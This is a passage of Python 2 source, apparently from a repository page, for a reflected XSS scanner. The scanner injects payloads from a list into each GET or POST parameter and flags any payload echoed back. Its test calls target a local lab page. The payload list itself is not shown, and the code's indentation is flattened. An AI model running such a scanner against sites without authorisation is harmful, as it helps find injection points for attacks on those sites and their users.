for pn, pv in zip(paraname, paravalue): # Scanning the parameter.
fpar.append(str(pn))
for i in payloads:
validate = i.translate(None, whitespace)
if validate == "":
progress = progress + 1
else:
progress = progress + 1
pname1.append(pn)
payload1.append(str(i))
d4rk = 0
for m in range(len(paraname)):
d = paraname[d4rk]
d1 = paravalue[d4rk]
tst = "".join(pname1)
tst1 = "".join(d)
if pn in d:
d4rk = d4rk + 1
else:
d4rk = d4rk + 1
pname1.append(str(d))
payload1.append(str(d1))
data = urllib.urlencode(dict(zip(pname1, payload1)))
r = br.open(path, data)
sourcecode = r.read()
pname1 = []
payload1 = []
if i in sourcecode:
results['value']=pn
results['payload']=i
return results
except:
pass
except:
pass
except Exception,e:
print e
def get_xss(url,level=1):
res1 = GET(url,level=level)
domain,data = url.split('?')[0],url.split('?')[1]
res2 = POST(domains=domain,data=data,level=level)
if res1 != None:
return res1
if res2 != None:
return res2
return None
if __name__ == '__main__':
a = GET(url='http://127.0.0.1/xss/level2.php?keyword=%E2%80%98&submit=%E6%90%9C%E7%B4%A2',level=3)
print a
b = POST(domains='http://127.0.0.1/xss/level2.php',data='keyword=&submit=搜索',level=3)
print b
c = get_xss(url='http://127.0.0.1/xss/level2.php?keyword=%E2%80%98&submit=%E6%90%9C%E7%B4%A2')
print c
Reference in New Issue View Git Blame Copy Permalink